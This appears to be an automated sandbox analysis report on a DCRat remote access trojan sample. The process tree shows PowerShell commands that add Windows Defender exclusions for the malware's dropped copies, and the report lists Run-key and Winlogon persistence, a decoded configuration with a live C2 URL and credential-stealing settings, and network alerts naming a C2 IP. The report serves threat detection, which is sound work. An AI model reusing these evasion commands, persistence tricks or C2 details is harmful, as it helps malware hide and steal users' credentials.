Edit tour

Windows Analysis Report
kQyd2z80gD.exe

Overview

General Information

Sample name:	kQyd2z80gD.exe renamed because original name is a hash value
Original sample name:	4A3BF58E23A86EA73D2F1D8BA04E7467.exe
Analysis ID:	1541137
MD5:	4a3bf58e23a86ea73d2f1d8ba04e7467
SHA1:	88099e13c38f4adfef4a64ca91b681c8cfa85834
SHA256:	ba30eaf70b11268accb528ce65cea53a3ec811d2e368e4a3d19ebdfaf02cc233
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains potential unpacker

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files to the user root directory

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

kQyd2z80gD.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\kQyd2z80gD.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

powershell.exe (PID: 984 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 348 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6300 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7432 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 4028 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2316 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 7064 cmdline: "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 5708 cmdline: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 2568 cmdline: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

SearchApp.exe (PID: 5644 cmdline: C:\Recovery\SearchApp.exe MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

SearchApp.exe (PID: 1252 cmdline: C:\Recovery\SearchApp.exe MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

WmiPrvSE.exe (PID: 5804 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

WmiPrvSE.exe (PID: 4568 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 7960 cmdline: "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

WmiPrvSE.exe (PID: 8076 cmdline: "C:\Recovery\WmiPrvSE.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

SearchApp.exe (PID: 8168 cmdline: "C:\Recovery\SearchApp.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 6696 cmdline: "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

WmiPrvSE.exe (PID: 7752 cmdline: "C:\Recovery\WmiPrvSE.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

SearchApp.exe (PID: 7956 cmdline: "C:\Recovery\SearchApp.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 3536 cmdline: "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

WmiPrvSE.exe (PID: 7984 cmdline: "C:\Recovery\WmiPrvSE.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

SearchApp.exe (PID: 7972 cmdline: "C:\Recovery\SearchApp.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

dLErkomWRcaRguaKAMtYMnt.exe (PID: 5688 cmdline: "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

WmiPrvSE.exe (PID: 7628 cmdline: "C:\Recovery\WmiPrvSE.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

SearchApp.exe (PID: 8096 cmdline: "C:\Recovery\SearchApp.exe" MD5: 4A3BF58E23A86EA73D2F1D8BA04E7467)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"6\":\"%\",\"b\":\"&\",\"O\":\")\",\"R\":\"_\",\"J\":\"^\",\"I\":\"-\",\"i\":\".\",\"k\":\"!\",\"2\":\"#\",\"H\":\";\",\"Y\":\"$\",\"m\":\">\",\"N\":\",\",\"1\":\"(\",\"n\":\" \",\"z\":\"|\",\"0\":\"~\",\"S\":\"`\",\"Q\":\"<\",\"T\":\"@\",\"l\":\"*\"}", "PCRT": "{\"c\":\"~\",\"U\":\"#\",\"T\":\")\",\"Q\":\"$\",\"9\":\"*\",\"D\":\"@\",\"Z\":\"(\",\"l\":\" \",\"b\":\",\",\"F\":\"&\",\"p\":\"_\",\"E\":\"<\",\"G\":\"`\",\"C\":\"^\",\"M\":\"%\",\"W\":\";\",\"8\":\"|\",\"x\":\".\",\"m\":\"!\",\"B\":\"-\",\"V\":\">\"}", "TAG": "", "MUTEX": "DCR_MUTEX-dR4mxS0dXrtmqfg1d4zb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cm36861.tw1.ru/@=M2MiBTN3ImM", "H2": "http://cm36861.tw1.ru/@=M2MiBTN3ImM", "T": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
kQyd2z80gD.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
kQyd2z80gD.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
kQyd2z80gD.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast

Dropped Files

Source	Rule	Description	Author	Strings
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast
C:\Recovery\SearchApp.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Recovery\SearchApp.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Recovery\SearchApp.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast
C:\Recovery\SearchApp.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast
C:\Recovery\SearchApp.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast
C:\Recovery\SearchApp.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast
C:\Recovery\WmiPrvSE.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Recovery\WmiPrvSE.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Recovery\WmiPrvSE.exe	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
0000002E.00000002.2878007510.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000033.00000002.3307757545.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2362007456.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000030.00000002.3048134310.0000000003200000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000033.00000002.3307757545.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000002E.00000002.2878007510.0000000002C30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000000.2044705339.00000000002B2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.00000000028A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000032.00000002.3211729351.000000000319D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2370785777.0000000002821000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000033.00000002.3307757545.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000031.00000002.3137179400.0000000003441000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.2365186797.0000000002431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000002F.00000002.2962029789.0000000002811000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000030.00000002.3048134310.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000023.00000002.2369951863.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000002D.00000002.2800446786.00000000030B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000002F.00000002.2962029789.0000000002820000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.2354789966.0000000002631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000028.00000002.2535198936.000000000259D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2364082505.0000000002691000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000028.00000002.2535198936.0000000002561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.2356027652.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000032.00000002.3211729351.0000000003181000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000002D.00000002.2800446786.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000032.00000002.3211729351.0000000003190000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000002A.00000002.2613445983.00000000024E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000002C.00000002.2703597080.00000000024F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000027.00000002.2448716973.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000002A.00000002.2613445983.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2362007456.0000000002CED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: kQyd2z80gD.exe PID: 6780	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7064	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7064	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 5708	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 2568	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchApp.exe PID: 5644	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchApp.exe PID: 1252	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 5804	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 4568	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7960	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 8076	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchApp.exe PID: 8168	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 6696	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7752	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchApp.exe PID: 7956	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 3536	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7984	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchApp.exe PID: 7972	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 5688	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7628	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SearchApp.exe PID: 8096	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 55 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.kQyd2z80gD.exe.2b0000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.0.kQyd2z80gD.exe.2b0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.kQyd2z80gD.exe.2b0000.0.unpack	MALWARE_Win_DCRat	DCRat payload	ditekSHen	0x748f6:$x2: DCRat-Log# 0x40a42:$x3: DCRat.Code 0x40266:$v1: Plugin couldn't process this action! 0x402b0:$v2: Unknown command! 0x74954:$v4: Saving log... 0x74970:$v5: ~Work.log 0x73c63:$v8: %SystemDrive% - Slow 0x73c8d:$v9: %UsersFolder% - Fast 0x73cb7:$v10: %AppData% - Very Fast

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe" , CommandLine: "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe, NewProcessName: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe, OriginalFileName: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe" , ProcessId: 5688, ProcessName: dLErkomWRcaRguaKAMtYMnt.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\kQyd2z80gD.exe, ProcessId: 6780, TargetFilename: C:\Recovery\WmiPrvSE.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\kQyd2z80gD.exe, ProcessId: 6780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dLErkomWRcaRguaKAMtYMnt

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kQyd2z80gD.exe", ParentImage: C:\Users\user\Desktop\kQyd2z80gD.exe, ParentProcessId: 6780, ParentProcessName: kQyd2z80gD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe', ProcessId: 984, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\kQyd2z80gD.exe, ProcessId: 6780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dLErkomWRcaRguaKAMtYMnt

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\kQyd2z80gD.exe, ProcessId: 6780, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kQyd2z80gD.exe", ParentImage: C:\Users\user\Desktop\kQyd2z80gD.exe, ParentProcessId: 6780, ParentProcessName: kQyd2z80gD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe', ProcessId: 984, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:57:09.154952+0200	2034194	1	A Network Trojan was detected	192.168.2.5	49704	92.53.106.114	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T13:57:27.029642+0200	2850862	1	Malware Command and Control Activity Detected	92.53.106.114	80	192.168.2.5	49743	TCP
2024-10-24T13:59:06.623415+0200	2850862	1	Malware Command and Control Activity Detected	92.53.106.114	80	192.168.2.5	49997	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: kQyd2z80gD.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\SearchApp.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064

Found malware configuration

Source: 0.0.kQyd2z80gD.exe.2b0000.0.unpack

